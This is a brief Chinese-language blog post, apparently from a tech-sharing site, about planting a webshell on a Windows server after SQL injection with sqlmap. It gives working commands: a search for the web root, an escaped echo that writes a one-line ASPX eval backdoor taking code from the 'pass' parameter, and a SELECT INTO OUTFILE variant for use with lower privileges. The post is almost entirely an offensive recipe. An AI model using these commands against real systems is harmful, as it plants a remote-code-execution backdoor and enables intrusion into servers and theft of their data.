您的位置:首页 > 运维架构 > Shell

关于--os-shell写websell

2020-07-30 01:48 841 查看

1.首先需要知道目录(web目录)
2.得是DBA权限

寻找web目录
dir C:\ /s /b | find “xLogin.aspx”

这里需要注意转义^

echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx'

os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshell

select   '<%@  Page  Language="Javascript"%> <%eval(Request.Item["pass"]);%>'   INTO  OUTFILE   'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: